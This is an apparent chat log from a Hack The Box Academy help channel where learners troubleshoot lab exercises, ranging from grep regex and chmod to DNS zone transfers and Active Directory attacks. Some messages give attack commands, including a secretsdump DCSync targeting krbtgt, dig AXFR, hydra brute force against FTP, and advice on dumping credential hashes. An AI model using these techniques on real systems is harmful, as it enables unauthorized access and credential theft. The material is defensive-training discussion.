try adding / at the end to search the whole system
This
and maybe 2>/dev/null if it starts spamming you with permission denied
^ it will
didnt work
Since / will attempt to also search root protected dirs
Yeah some of the prompts are a bit dumb tbh
"Line starts with" except some of the valid lines use #
ask chatgpt but i would not "lose" too much time with that xd
It's really dumb and I can see where frustration could happen with it lol
ok now It worked with
grep -E "Permit.*\s" /etc/ssh/sshd_config
Thank you 🙂
...
"now"
i had forgotten s earlier
Lol
Regular Expressions Syntax Reference. Includes tables showing syntax, examples and matches.
Btw
it's normal that the output gave me 634 file ?
or was it that I used grep -E "(Permit.*\s)" /etc/ssh/sshd_config
( )
Wc gives line numbers and character count
when i remove the wc i really have 634 path of different file
You only really need the () if you're doing multiple expressions
Which is what the question is asking for (the filename)
But 634 is irrelevant
i dont find more hint in the question to filter more in the 634 files
i forget exactly how this question went, but it does mention config files
maybe something to do with the name, or the starting path?
oh i found it
yes thanks
Btw they give you a search command in the examples :) which is also helpful
ok ,, thanks
so the .*\s if I want to filter lines that start with Permit and $ when it ends with Permit ? or is it only the -- *
So this one is actually tricky.
Like I said these prompts are kinda dumb because there's no "wrong/right" case
So this isn't asking for lines that start with permit
It's looking for words that start with Permit
sorry i meant words
I.e. if you know that a line starts with Bob and ends with Lisa but don't care what's in between you'd use "^Bob.*Lisa$"
But like I said this is dumb, as some of the lines start with #
So you'd need to filter the line starts with ones with both "(^#\bSearch|^Search)"
If you do wanna look through the resources me and xreous sent, feel free - RegEx is really good to learn
Another thing with grep, if you add -n it adds line number
So how can i fix this on attack machine or where can i go to get precompiled?
Should be a static compile option for it, I think it's been mentioned before
ok I didnt need to use #
but and what if I only want words that ends with "login"
Login$
$ is the end of line character
"(^|\b).*Login(\b)"
\b is "word boundary" meaning a space/anything that separates it
End is only if you're looking for end of line
Also to get a word only it's "\bLogin.*\b"
shows nothing without the |
no im trying out tryna learn it
yes then
OK after some digging using your keyword are you trying to search for just the one that *starts with Login(Whatever)?
ok when I tried yes it worked .. =/
that only ends with Login
So you'll need to add the # character in it. No lines end with Login in that file
hey guys is there some online hack testing servers, i mean servers which i can try to access through nmap and all for practicing. ik there's HTB labs but i haven't dived much into it. is it free? can i access it through local pc or does it have in built terminal?
I suggest making your own test file with a bunch of different cases to see what you can do differently
hi i need help with second order lfi challange anyone?
Htb labs is free, you need to use a provided vpn to access the labs, note: the vpn only connects you to their servers - it does not reroute traffic
hey guys i need help on Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer. i find all DNS subdomains but not txt flag at all of them 3 days i'm stuck here please help
module name is modern web exploitation
If it's a challenge on https://app.hackthebox.com then #challenges
do i have to use their vpn or can i use proxychains?
academy
ATTACKING COMMON SERVICES under Attack DNS
You have to use their vpn, as the boxes spawn on an internal network
"(^|\b).*yes(\b)"
shows me.
words space between the words and yes. like
pam yes
not yes
pass code yes
cpm uno yes
Just look for "yes$"
Anyone available for modern web exploitation - second order lfi question ?
dig axfr subdomain.inlanefreight.htb @ip
hr.inlanefreight.htb ns.inlanefreight.htb control.inlanefreight.htb helpdesk.inlanefreight.htb i do for all of them no Flag i tired 😦
One of those is correct, or should be
ok now I get it ,,, thanks once again
In module: PIVOTING, TUNNELING, AND PORT FORWARDING and in section: Meterpreter Tunneling & Port Forwarding
I get error when I try to run autoroute in metasploit, is it outdated script or something? Already tried to update metasploit to the newest version and running metasploit as root
ohh tysm so many of the channels were locked
iknow is ns. and hr is correct but no flag on DNS records TXT
mmmm zone transfer with ettercap ?
😢 3 day never have this time for small thing like this
No
CNAME
mmm i will seee now
Just engage your brain a tiny bit, and read
And take notes when you're doing modules
If you are taking notes: your notes are shit 
dig AXFR @ns.inlanefreight.htb inlanefreight.htb
; <<>> DiG 9.19.19-1-Debian <<>> AXFR @ns.inlanefreight.htb inlanefreight.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.
Anyone available for modern web exploitation - second order lfi question ?
i find thanks
Use ip
This cannot work unless you have mapped ns.inlanefreight.htb to the IP address of the target in the /etc/hosts file
But that makes no sense. You can use the IP address directly
Just ask your question dude
finally i find
my god long time for this flag wow
thanks Marcielee
@fathom pendant Thanks
Read up on the subject of DNS so that you understand exactly what happens and when.
i change filename to flag and username to admin, htb-admin, root and etc but can't read flag. I do it according to reading material with correct order. What i am doing wrong? username is guessy i think
anyone had any issues with dirtypipe exploit
I mean, look at how DNS works in general.
If you had understood how DNS works, you wouldn't have been in this position in the first place
When I want to login to splunk I get a 403 I have been having this error since yesterday 😦
Where are you trying to log in to Splunk? Did you use https?
yes i try my best to understand as English is not my mom language so i have a problem understanding the words and understanding the way xD it takes time but its ok ... i love it
Yes I did
I'm trying from there https://splunkbase.splunk.com/app/3544
https://www.cloudflare.com/learning/dns/what-is-dns/
You can change the language at the top right
It work when I'm outside of the pwnbox but not when I'm in it
thanks PayloadBunny
Then download the file from your PC and use it from there.
Yeah but I would need to setup the vpn and I don't really want to
Hi everyone!
I need help with ADCS
I think there is a technical problem with the ADCS module's ESC11. I took screenshots, you can see I can use hashes of "lab-dc" I got error, but I can dump hashes but they belong to lab-dc
I need hashes of "ws01"
When I try to use hash of "ws01" account I am getting exact same error, but I couldn't dump hashes. Why? What should I suppose to do?
PLEASE DO NOT DELETE. I GUARANTEE THERE IS NO SPOILER
I asked help from support in website, but I haven't get response yet
It's been 2 days I stuck
If it doesn't work from the PwnBox, then you don't have much choice
Hi 👋 Can you help me with above problem : )
why are you using secretsdump on ws01?
why dont they work ?
$ chmod cdhmod a+r shell && ls -l shell
$ chmod 754 shell && ls -l shell
Because you need to provide a file to chmod
I followed lab
and I need Administrator's hash
you dcsync'd DC didn't you?
To be honest I didn't understand what you asked
do you mean etc/ssh/sshd_config or what
Does "shell" exist as a file
doing the ADCS module kinda require you to be familiar with the common AD attacks, you used secretsdump on dc, so you have the administrator's hash
no .. no such command
bash : shell : command not found
If you ls your current directory, does the file exist
If not, then you need to create the file first
Yes but that hash belongs to "lab-dc" hostname Module asking hash of ws01 which I couldn't get
I got .pfx file of "lab-dc" i couldn't get file of "ws01" but using pfx file I am able to get .ccache file and hash of "lab-dc" account
Using only lab-dc hash I can dump all users hash including administrator but they are wrong because their hostname is "lab-dc" not ws01.
Then I realised I have ws01 accounts hash too. When I repeat process I couldn't get hashes of ws01
didnt have one .. create shell or what ?
The section likely went over this
when you dcsync you get hashes of all users, including the domain admin
I did but it says wrong, I connected with pass the hash attack to check that account is "lab-dc" module asking hash of "ws01"
You finished ADCS module which released recently. ?
they showed how to create a .txt if thats what u mean ?
Yes
they're asking for the hash of the local admin, dump the reg hives of ms01 with DA's creds
I think you misunderstood problem. Anyway, thank you for trying to help
The method works for creating any file btw
shell.txt chmod a+r shell && ls -l shell ??
access denied
no I didn't, I finished the module
sudo maybe
I meant ws01 here
ESC11 lab didn't mention any reg hives, after getting .pfx file it mentioned to ESC8 attack scenario. That's why I can not find ws01's hash.
Thank you anyway I will try
where are you gonna find ws01's local admin hash then?
I was thinking I am supposed to find it by using secretsdump with ws01 hash. I will try your suggestion
secretsdump is for dcsync in this case, ws01 is not a DC
Thank you : ) If you don't mind me I want to ask one more thing. How many time it take to learn professionally Active Directory for you?! I am about to dive into active directory
Ive tried
shell chmod a+r shell && ls -l shell
shell.txt chmod a+r shell %% ls-s shell.txt
shell.txt chmod a+r shell %% ls-s shell.t /etc/ssh/sshd_config
chmod missing operand
permission denied
the main AD module in academy will set you up pretty well
Ive tried for 30min now can you please help me
Hello! I got stuck at AD Enumeration & Attacks - Skills Assessment Part II. Currently I am Q4. I got a bunch of usernames by using crackmapexec --users with the creds that i found earlier. The question is "Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain". How can i find the user with weak credentials?
Welcome1 is a weak credential xd is a tricky question
But how did you get Welcome1?
This password has been used x times in the module
yes but like it doesnt connect in any way to the assessment... Anyway thank you for your help 🙂
i was like creating pw list with spices and shit like that
thats the tricky part
No, it is not directly related to the assessment.
You simply try a lead-free password and see if you are lucky.
Since you don't know anything about the company and therefore can't use OSINT, you have to rely on the module.
makes sense but still a bit twisted
Hey guys, this question is not for a specific module but it definitely has to do with multiple modules (please refer me to the correct channel if this is not it). Do you know if its possible to use BurpSuite over a double pivot connection? I have a double pivot set up with chisel and I am trying to access a website in the second subnet. I can do it with proxychains curl but I cannot seem to figure out how to configure burp (or firefox) to be able to access it?
PS I know ligolo-ng works better but I couldn't use it in my situation
I Typed chmod
chmod : missing operand
do I have to install something before using it
No
Missing operand means that you're missing arguments
I.e. chmod 754 filename
Btw if you're changing shell.txt you need to specify the .txt
I.e is new to me
ok my bad, english is not my motherlanguage
I tried to create one
shell.txt chmod a+r shell && ls-s shell.t /etc/ssh/sshd_config
Why are you adding /etc/ssh/sshd_config
Break your command down into its components
But at this point I'm tired of trying to help through a language barrier
As it ends up flooding the channel
Because i already tried everything else I know
When I say break it down: what do you think I mean
Because I understand you want/need help. But you also need to learn how to rely on yourself in the absence of others
man Im trying Ive been working with this for the last 7 hours
Take a break and step away
ok after this one
Reading the manual and help of commands really is gonna be useful
If you're misunderstanding the module, then likely the translation/translator is missing something
I think u mean that I should type in one part at the time ....
adding
Yes one section of commands at a time
Break the command into the two halves
With && being the separator
chmod cannot access shell no such file or directory
Alright, there's your first clue
The file "shell" doesn't exist
You made shell.txt
Not 'shell'
yes then I tried to create the shell both >shell.txt. >shell
Take it step by step from the section in the module
ok got it
only
shell
not at the same time
I meant not on the same line
Do me a favor
Ok now I can take a break
Link your main htb account following #welcome (its the labs site https://app.hackthebox.com )
So you can post screenshots
ok .. I thought it was here you could ask questions about the modules
but sure Ill do it now
Yes you can ask questions
But without a screenshot a lot of what you're trying to say gets lost in translation
Leading to increased frustration
aha ok , Im trying to run the identifier in bot-commands but it says its blocked
"Blocked"
It's likely due to your messaging settings
Not allowed from anyone but friends
im lost about how to find the hidden port in https://academy.hackthebox.com/module/19/section/119
seems like i tried all the methods given
Read this Section again
https://academy.hackthebox.com/module/19/section/106
Hey guys, i´m currently stuck at the "Attacking Common Services - SQL" module.
I just can´t connect to the db no matter what i try.
With mssqlclient, it just hangs forever and gets connection timed out after a while and with sqsh it does not execute commands.
I restarted the box multiple time and changed my vpn file
pwnbox is the same thing
ok thanks man, I see now that there is whole of stuff for training there 🙂
why doesnt this work? skill assessment 2 attacking common applications
http
Just wondering, has htb helped anyone get a job? Like with experience
Says no access
They're gonna need to link their htb account following instructions from #welcome
It seems you cannot link a HTB academy account to discord. Only a "main" HTB account can be linked
Yes, you can currently only link accounts to Discord from the main page.
I am stuck in 'Intro to Active Directory Module' while removing a user
In AD administration: Guided Part 1
```
At line:1 char:1
+ Remove-ADUser -Identity pvalencia
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (pvalencia:ADUser) [Remove-ADUser], UnauthorizedAccessException
+ FullyQualifiedErrorId : ActiveDirectoryCmdlet:System.UnauthorizedAccessException,Microsoft.ActiveDirectory.Management.Commands.RemoveADUser
```
Is this right plaform to ask for help?
that is a fqdn not an url 🙂
url's have protocol
can someone explain why there's like two sections on reverse engineering in the attacking common applications and no where else in the path?
Question
Is there a way to detect Server Side Include injections? Because there doesn't seem to be any evidence in the request/response...
hi
Guys need help I posted my question in support can someone help me?
I have Mac and I want to use Parrot ISO what do you recommend VMware Workstation Player or Oracle Virtual Box ???
What is it about?
I use Parallels on my Mac
About PwnBox need some info
#1024429874246590575 isn't support btw
how much do you pay ?
Sorry am new here
Actual support for technical issues and questions is on the website
Need to speak to a person? Learn how to reach our support via HTB Labs.
Okay Thanks
can someone help me with Broken authentication, predictable reset token?
Man, I've been stuck on Target is spawning... for a reallllly long time. I don't have anything else running, is there like... a cache I can clear or something 😓
hello everybody
Same. After multiple attempts I was able to spawn the target. That's great and all, but now an nmap scan is taking fooooorrrreeeeevvvveeeerrrrr. Something's gotta be up today
Makes sense. How did you get it in the first place? Just refreshing and hitting spawn repeatedly?
why cant I start the ovpn file I downloaded ?
what should I type in the terminal ?
sudo openvpn /path/to/file.ovpn
I logged out/in and just re-tried to spawn it a handful of times. It eventually came up.
command not found
Then sudo apt install openvpn
I'm assuming you're doing this from a linux vm
🫣
use the command in the download folder
parrot os is bad, I tried a lot, but I couldn't run systems in virtual box, I ended up going back to kali linux
Ive finished it
do it again
I've had 0 issues with parrot on mine aside from the recent upgrade issues
Then do you have the parrot VM running?
bro, I had hardware problems also stereo sound and headphone did not work
I have not installed Parrot yet , I doest open the iso file
skills issue
The Setting Up Module should walk you through installing it
There's also docs on the parrot site on how to install on virtualbox
This is slowly becoming the "Try Harder" of this server 😂
lol
https://academy.hackthebox.com/achievement/423975/path/16
Yes, I'm a beginner and I tried several methods on forums and YouTube, but none of them worked :/

only took me like 2 fr@kin years nearly!
Gg
So silver annual is definitely not worth it. /s
Tbh unless you are a beginner and need all the basic knowledge
kali was the better choice anyway
student plan is the best deal but I was only working on it in spare time if you work more on it youll get done alot quicker maybe 6 months
If all you want is a cert path then silver annual is definitely not it.
way to stick with it though!
Hey guys im going insane. Im on the Attacking Domain Trust -> Child from Linux. Im trying to dcsync with secretsdump but i cant figure the password for the user needed. Here my command:
secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt
anyone got a hint?
Try using a user that you do know the pw for
Im trying, I dont understand why It dont work. Should I download the apple silicon instead of the parrot Iso ?
You're using a Mac?
Ah
That's entirely why then
The iso is for amd64 architecture, I take it your Mac likely has an M1/M2 chip
You'd need to download the ARM version
(Silicon)
Knowing which architecture your system is vastly increases your success at installing things
hello everyone, is anyone who is taking the learning path of web senior penetration tester in htb academy? I am legit stuck in this module of NoSQL injection https://academy.hackthebox.com/module/171/section/1684 if anyone knows this module could you please DM me privately? thank you so much 🙂
hello guy i have problem the footprint lab medium
why’s that
i have imported a exploit in metasploit-framework/modules/exploits/....
from inside of msfconsole i cant find it by using search Lightweight or similar
what am i doing wrong here?
im currently trying to exploit the blog aka Host2 from Shells & Payloads Assessments
I'm a bit new and after getting to a certain point in this room I got stuck.
im trying to look it up inside of msfc by searching for Parts inside the Name parameter
i found the nfs mount, i do and im found the username passwd
but i dont know this cred what i do
sorry my english im still learning
is there no one who completed this module INTRODUCTION TO NOSQL INJECTION ? I am stuck on MangoSearch i've tried various payload injections in order to exfiltrate the data.... can't get nada... https://academy.hackthebox.com/module/171/section/1684
navigate with su privilege
use exploit/exploit_name
try
verify your account by following the steps in the #welcome channel
ah thx 🙂
Rdp?
yes rdp i can try but terminal output old tls version and not working
my subscription htb academy my school how can i my account verify
Tbh your limited English is going to be a really hard factor in assisting you. Unfortunately this server is English Only
Update your VM.
no problem i can use translate
There seems to be many gaps in what you know, and what the translator may misinterpret
Especially when acronyms get involved
Careful with sharing things, as they may contain spoilers
okey sorry
@cedar yew check ur DM
still stuck 😦
Hey guys I'm struggling with attacking common services lab easy, I found f username but I don't know why hydra fails when trying to brute force ftp service, it says [ERROR] Not an FTP protocol and terminates... is it normal for that box? I already tried to reset it
I have a better chance running nmap over tcp openvpn rather than udp based openvpn tunnels
Then you might need to browse for it with virtualbox it's not some magical oracle
You might need to point it to your downloads folder
It works now ,, I had missed one thing
👍
Hello,
I'm studying the dcsync attack and I have some questions when kerberos is in use
Is the Drsuapi accessible over smb and named pipe?
should any of the nmap scans take a really long time?
@wind meadow it can take a long time if you scan all ports
yeah.. that's doing 'er
makes moving through modules real slow if you have to try multiple options to evade firewall scanning all ports
@wind meadow press enter should show progress when doing nmap
and as I said above, better use tcp based openvpn
i do
@wind meadow you can play with speed options like -T4 or -T5 or use the --top-ports option
im not learning anything waiting half hour for a scan to complete
update: using hydra with -t 1 seems to work but obviously is very slow, hoping that the user password is in the pws_list.txt🥲
It's likely a connection issue: basic scans should take about a minute also: try not to combine full port scans (-p-) with scripting or other extensive options
Ftp should be able to be done with -t 48
That's odd if it's only letting 1, default is like 16 for ftp
I don't know why it crashes with -t higher than 1...
Make sure you set the resources appropriately, 50% of your RAM and a good portion of storage
I cannot find f password in the default list... arghhhh
ok
any hints?
Likely a connection related issue: if you can ping the target, what is the avg ping
it looks normal
It should be in the pws list from what I recall.
30 ms
Are you using the full username@domain or just username
just username for ftp
Weird. I don't recall any restrictions
Get our latest version with over 20 powerful new features to boost performance and productivity. Optimized for Apple M1 and M2 series chips and ready for macOS Ventura (when released).
it’s not😉
have you tried the other ones ?
😦
Wait is this the one with the pw on the other protocol?
no, parallels worked well for me
there’re 3 protocols he could attack😉
😉
Thanks for reminding me of context, really need to clean my notes up on this
guys, where can i ask general questions?
what % should I set the processors at ?
1-2 is fine
Generally your safe bubble is 50%
Hi, im stuck on :
ATTACKING COMMON SERVICES / Attacking DNS
Q: Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.
i try this:
<<>> DiG 9.18.12-1~bpo11+1-Debian <<>> AXFR @IP inlanefreight.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.
WHAT CAN I DO?

:troll~1
